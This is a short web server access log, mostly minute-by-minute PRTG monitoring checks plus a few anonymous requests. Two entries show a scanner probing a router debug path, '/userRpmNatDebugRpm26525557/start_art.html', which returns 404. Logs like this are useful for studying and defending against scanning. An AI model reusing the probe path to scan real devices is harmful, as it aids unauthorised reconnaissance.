212.91.247.32 - - [01/Jul/2025:20:48:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [01/Jul/2025:20:49:06 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:49:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:51:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [01/Jul/2025:20:52:07 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:20:52:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:53:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:54:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:55:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:56:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:20:57:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [01/Jul/2025:20:58:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [01/Jul/2025:20:58:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [01/Jul/2025:20:58:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:20:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:00:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
204.76.203.206 - - [01/Jul/2025:21:01:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:21:01:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:02:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:03:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [01/Jul/2025:21:04:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
